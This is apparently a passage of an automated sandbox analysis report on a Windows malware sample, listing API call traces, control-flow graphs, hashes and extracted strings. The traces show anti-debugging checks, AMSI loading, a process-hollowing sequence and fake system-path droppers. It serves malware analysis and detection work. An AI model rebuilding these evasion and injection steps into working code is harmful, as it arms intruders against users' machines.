Sleep 30602->30603 30603->30600

                                                                                                                                            Executed Functions

                                                                                                                                            Function 027CF0A8 Relevance: 243.3, APIs: 11, Strings: 122, Instructions: 10535filesleepCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • InetIsOffline.URL(00000000,00000000,027DB3D5,?,?,?,000002F7,00000000,00000000), ref: 027CF0E2
                                                                                                                                              • Part of subcall function 027C881C: LoadLibraryA.KERNEL32(00000000,00000000,027C8903), ref: 027C8850
                                                                                                                                              • Part of subcall function 027C881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,027C8903), ref: 027C8860
                                                                                                                                              • Part of subcall function 027C881C: GetProcAddress.KERNEL32(74AD0000,00000000), ref: 027C8879
                                                                                                                                              • Part of subcall function 027C881C: FreeLibrary.KERNEL32(74AD0000,00000000,02812388,Function_000065D8,00000004,02812398,02812388,000186A3,00000040,0281239C,74AD0000,00000000,00000000,00000000,00000000,027C8903), ref: 027C88E3
                                                                                                                                              • Part of subcall function 027CEFC8: GetModuleHandleW.KERNEL32(KernelBase,?,027CF3CC,UacInitialize,0281237C,027DB40C,UacScan,0281237C,027DB40C,ScanBuffer,0281237C,027DB40C,OpenSession,0281237C,027DB40C,ScanString), ref: 027CEFCE
                                                                                                                                              • Part of subcall function 027CEFC8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 027CEFE0
                                                                                                                                              • Part of subcall function 027CF024: GetModuleHandleW.KERNEL32(KernelBase), ref: 027CF034
                                                                                                                                              • Part of subcall function 027CF024: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 027CF046
                                                                                                                                              • Part of subcall function 027CF024: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 027CF05D
                                                                                                                                              • Part of subcall function 027B7E10: GetFileAttributesA.KERNEL32(00000000,?,027CFD00,ScanString,0281237C,027DB40C,OpenSession,0281237C,027DB40C,ScanString,0281237C,027DB40C,UacScan,0281237C,027DB40C,UacInitialize), ref: 027B7E1B
                                                                                                                                              • Part of subcall function 027BC2E4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,029068C8,?,027D0032,ScanBuffer,0281237C,027DB40C,OpenSession,0281237C,027DB40C,ScanBuffer,0281237C,027DB40C,OpenSession), ref: 027BC2FB
                                                                                                                                              • Part of subcall function 027CDFE4: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,027CE0B4), ref: 027CE01F
                                                                                                                                              • Part of subcall function 027CDFE4: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,027CE0B4), ref: 027CE04F
                                                                                                                                              • Part of subcall function 027CDFE4: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 027CE064
                                                                                                                                              • Part of subcall function 027CDFE4: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 027CE090
                                                                                                                                              • Part of subcall function 027CDFE4: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 027CE099
                                                                                                                                              • Part of subcall function 027B7E34: GetFileAttributesA.KERNEL32(00000000,?,027D2E7D,ScanString,0281237C,027DB40C,OpenSession,0281237C,027DB40C,ScanBuffer,0281237C,027DB40C,OpenSession,0281237C,027DB40C,Initialize), ref: 027B7E3F
                                                                                                                                              • Part of subcall function 027B7FC8: CreateDirectoryA.KERNEL32(00000000,00000000,?,027D301B,OpenSession,0281237C,027DB40C,ScanString,0281237C,027DB40C,Initialize,0281237C,027DB40C,ScanString,0281237C,027DB40C), ref: 027B7FD5
                                                                                                                                              • Part of subcall function 027CDF00: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,027CDFD2), ref: 027CDF3F
                                                                                                                                              • Part of subcall function 027CDF00: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 027CDF79
                                                                                                                                              • Part of subcall function 027CDF00: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 027CDFA6
                                                                                                                                              • Part of subcall function 027CDF00: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 027CDFAF
                                                                                                                                              • Part of subcall function 027C8798: LoadLibraryW.KERNEL32(bcrypt,?,000005DC,00000000,028123A4,027CA3BF,ScanString,028123A4,027CA774,ScanBuffer,028123A4,027CA774,Initialize,028123A4,027CA774,UacScan), ref: 027C87AC
                                                                                                                                              • Part of subcall function 027C8798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 027C87C6
                                                                                                                                              • Part of subcall function 027C8798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000005DC,00000000,028123A4,027CA3BF,ScanString,028123A4,027CA774,ScanBuffer,028123A4,027CA774,Initialize), ref: 027C8802
                                                                                                                                              • Part of subcall function 027C8704: LoadLibraryW.KERNEL32(amsi), ref: 027C870D
                                                                                                                                              • Part of subcall function 027C8704: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 027C876C
                                                                                                                                            • Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,0281237C,027DB40C,OpenSession,0281237C,027DB40C,ScanBuffer,0281237C,027DB40C,OpenSession,0281237C,027DB40C,027DB764), ref: 027D4DEB
                                                                                                                                              • Part of subcall function 027CDE78: RtlInitUnicodeString.NTDLL(?,?), ref: 027CDEA0
                                                                                                                                              • Part of subcall function 027CDE78: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,027CDEF2), ref: 027CDEB6
                                                                                                                                              • Part of subcall function 027CDE78: NtDeleteFile.NTDLL(?), ref: 027CDED5
                                                                                                                                            • MoveFileA.KERNEL32(00000000,00000000), ref: 027D4FEB
                                                                                                                                            • MoveFileA.KERNEL32(00000000,00000000), ref: 027D5041
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$LibraryPath$AddressModuleNameProc$FreeHandleLoadName_$AttributesCloseCreateMove$CheckDebuggerDeleteDirectoryInetInformationInitOfflineOpenPresentQueryReadRemoteSleepStringUnicodeWrite
                                                                                                                                            • String ID: .url$@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or$@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
                                                                                                                                            • API String ID: 2010126900-181751239
                                                                                                                                            • Opcode ID: b322d12c35e9e700eee3902db1256f07a2950e8eaca4f9b9f0ff04b6d921a3fa
                                                                                                                                            • Instruction ID: b126c6ac4d6ebe0b411f7f5f1b1dabe56d872041d7d49a813cec7fd331464194
                                                                                                                                            • Opcode Fuzzy Hash: b322d12c35e9e700eee3902db1256f07a2950e8eaca4f9b9f0ff04b6d921a3fa
                                                                                                                                            • Instruction Fuzzy Hash: B724F975A101598FDB23EBA4DDA4BDE73B6FF98304F1180E5E009A7656DE30AE858F10
                                                                                                                                            Function 027C8BA8 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654threadnativeinjectionCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 6997 27c8ba8-27c8bab 6998 27c8bb0-27c8bb5 6997->6998 6998->6998 6999 27c8bb7-27c8c9e call 27b493c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c 6998->6999 7030 27ca6ef-27ca759 call 27b44d0 * 2 call 27b4c0c call 27b44d0 call 27b44ac call 27b44d0 * 2 6999->7030 7031 27c8ca4-27c8d7f call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c 6999->7031 7031->7030 7075 27c8d85-27c90ad call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b30d4 * 2 call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b4d8c call 27b4d9c call 27c85d4 7031->7075 7184 27c90af-27c911b call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c 7075->7184 7185 27c9120-27c9441 call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b46a4 * 2 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b2ee0 call 27b2f08 call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c GetThreadContext 7075->7185 7184->7185 7185->7030 7293 27c9447-27c96aa call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27c824c 7185->7293 7366 27c99b7-27c9a23 call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c 7293->7366 7367 27c96b0-27c9819 call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27c84bc 7293->7367 7394 27c9a28-27c9ba8 call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27c79ac 7366->7394 7457 27c981b-27c9841 call 27c79ac 7367->7457 7458 27c9843-27c98af call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c 7367->7458 7394->7030 7498 27c9bae-27c9ca7 call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27c8ab8 7394->7498 7466 27c98b4-27c99ab call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27c79ac 7457->7466 7458->7466 7537 27c99b0-27c99b5 7466->7537 7549 27c9ca9-27c9cf6 call 27c89b0 call 27c89a4 7498->7549 7550 27c9cfb-27ca453 call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27c7cf8 call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27c7cf8 call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c SetThreadContext NtResumeThread call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b2c2c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27c8798 * 3 call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c 7498->7550 7537->7394 7549->7550 7775 27ca458-27ca6ea call 27c8798 * 2 call 27b480c call 27b494c call 27b4798 call 27b494c call 27c8798 call 27b480c call 27b494c call 27b4798 call 27b494c call 27c8798 * 5 call 27b480c call 27b494c call 27b4798 call 27b494c call 27c8798 call 27b480c call 27b494c call 27b4798 call 27b494c call 27c8798 call 27b480c call 27b494c call 27b4798 call 27b494c call 27c8798 call 27b480c call 27b494c call 27b4798 call 27b494c call 27c8798 call 27c7ecc call 27c8798 * 2 7550->7775 7775->7030
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 027C881C: LoadLibraryA.KERNEL32(00000000,00000000,027C8903), ref: 027C8850
                                                                                                                                              • Part of subcall function 027C881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,027C8903), ref: 027C8860
                                                                                                                                              • Part of subcall function 027C881C: GetProcAddress.KERNEL32(74AD0000,00000000), ref: 027C8879
                                                                                                                                              • Part of subcall function 027C881C: FreeLibrary.KERNEL32(74AD0000,00000000,02812388,Function_000065D8,00000004,02812398,02812388,000186A3,00000040,0281239C,74AD0000,00000000,00000000,00000000,00000000,027C8903), ref: 027C88E3
                                                                                                                                              • Part of subcall function 027C85D4: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 027C8660
                                                                                                                                            • GetThreadContext.KERNEL32(000005DC,02812420,ScanString,028123A4,027CA774,UacInitialize,028123A4,027CA774,ScanBuffer,028123A4,027CA774,ScanBuffer,028123A4,027CA774,UacInitialize,028123A4), ref: 027C943A
                                                                                                                                              • Part of subcall function 027C824C: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 027C82BD
                                                                                                                                              • Part of subcall function 027C84BC: NtUnmapViewOfSection.NTDLL(?,?), ref: 027C8521
                                                                                                                                              • Part of subcall function 027C79AC: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 027C7A1F
                                                                                                                                              • Part of subcall function 027C7CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 027C7D6C
                                                                                                                                            • SetThreadContext.KERNEL32(000005DC,02812420,ScanBuffer,028123A4,027CA774,ScanString,028123A4,027CA774,Initialize,028123A4,027CA774,0000060C,002B9FF8,028124F8,00000004,028124FC), ref: 027CA14F
                                                                                                                                            • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(000005DC,00000000,000005DC,02812420,ScanBuffer,028123A4,027CA774,ScanString,028123A4,027CA774,Initialize,028123A4,027CA774,0000060C,002B9FF8,028124F8), ref: 027CA15C
                                                                                                                                              • Part of subcall function 027C8798: LoadLibraryW.KERNEL32(bcrypt,?,000005DC,00000000,028123A4,027CA3BF,ScanString,028123A4,027CA774,ScanBuffer,028123A4,027CA774,Initialize,028123A4,027CA774,UacScan), ref: 027C87AC
                                                                                                                                              • Part of subcall function 027C8798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 027C87C6
                                                                                                                                              • Part of subcall function 027C8798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000005DC,00000000,028123A4,027CA3BF,ScanString,028123A4,027CA774,ScanBuffer,028123A4,027CA774,Initialize), ref: 027C8802
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Library$MemoryThreadVirtual$AddressContextFreeLoadProc$AllocateCreateHandleModuleProcessReadResumeSectionUnmapUserViewWrite
                                                                                                                                            • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                            • API String ID: 4083799063-51457883
                                                                                                                                            • Opcode ID: 3e34e1bee8c1344cce7922cf285d0a3eee4c2351becbd6899f3d1d9d681baccd
                                                                                                                                            • Instruction ID: aba923023191f79d0898cd8d875896c61cae5dfa7a11bc47b4579d326ebf699b
                                                                                                                                            • Opcode Fuzzy Hash: 3e34e1bee8c1344cce7922cf285d0a3eee4c2351becbd6899f3d1d9d681baccd
                                                                                                                                            • Instruction Fuzzy Hash: BBE22D75A105299FDB13EB74CCB9BCE73BABF88300F2141BAE005AB255DA309E458F51
                                                                                                                                            Function 027C8BA6 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605threadCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 7853 27c8ba6-27c8bab 7855 27c8bb0-27c8bb5 7853->7855 7855->7855 7856 27c8bb7-27c8c9e call 27b493c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c 7855->7856 7887 27ca6ef-27ca759 call 27b44d0 * 2 call 27b4c0c call 27b44d0 call 27b44ac call 27b44d0 * 2 7856->7887 7888 27c8ca4-27c8d7f call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c 7856->7888 7888->7887 7932 27c8d85-27c90ad call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b30d4 * 2 call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b4d8c call 27b4d9c call 27c85d4 7888->7932 8041 27c90af-27c911b call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c 7932->8041 8042 27c9120-27c9441 call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b46a4 * 2 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b2ee0 call 27b2f08 call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c GetThreadContext 7932->8042 8041->8042 8042->7887 8150 27c9447-27c96aa call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27c824c 8042->8150 8223 27c99b7-27c9a23 call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c 8150->8223 8224 27c96b0-27c9819 call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27c84bc 8150->8224 8251 27c9a28-27c9ba8 call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27c79ac 8223->8251 8314 27c981b-27c9841 call 27c79ac 8224->8314 8315 27c9843-27c98af call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c 8224->8315 8251->7887 8355 27c9bae-27c9ca7 call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27c8ab8 8251->8355 8323 27c98b4-27c99b5 call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27c79ac 8314->8323 8315->8323 8323->8251 8406 27c9ca9-27c9cf6 call 27c89b0 call 27c89a4 8355->8406 8407 27c9cfb-27ca6ea call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27c7cf8 call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27c7cf8 call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c SetThreadContext NtResumeThread call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b2c2c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27c8798 * 3 call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27c8798 * 2 call 27b480c call 27b494c call 27b4798 call 27b494c call 27c8798 call 27b480c call 27b494c call 27b4798 call 27b494c call 27c8798 * 5 call 27b480c call 27b494c call 27b4798 call 27b494c call 27c8798 call 27b480c call 27b494c call 27b4798 call 27b494c call 27c8798 call 27b480c call 27b494c call 27b4798 call 27b494c call 27c8798 call 27b480c call 27b494c call 27b4798 call 27b494c call 27c8798 call 27c7ecc call 27c8798 * 2 8355->8407 8406->8407 8407->7887
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 027C881C: LoadLibraryA.KERNEL32(00000000,00000000,027C8903), ref: 027C8850
                                                                                                                                              • Part of subcall function 027C881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,027C8903), ref: 027C8860
                                                                                                                                              • Part of subcall function 027C881C: GetProcAddress.KERNEL32(74AD0000,00000000), ref: 027C8879
                                                                                                                                              • Part of subcall function 027C881C: FreeLibrary.KERNEL32(74AD0000,00000000,02812388,Function_000065D8,00000004,02812398,02812388,000186A3,00000040,0281239C,74AD0000,00000000,00000000,00000000,00000000,027C8903), ref: 027C88E3
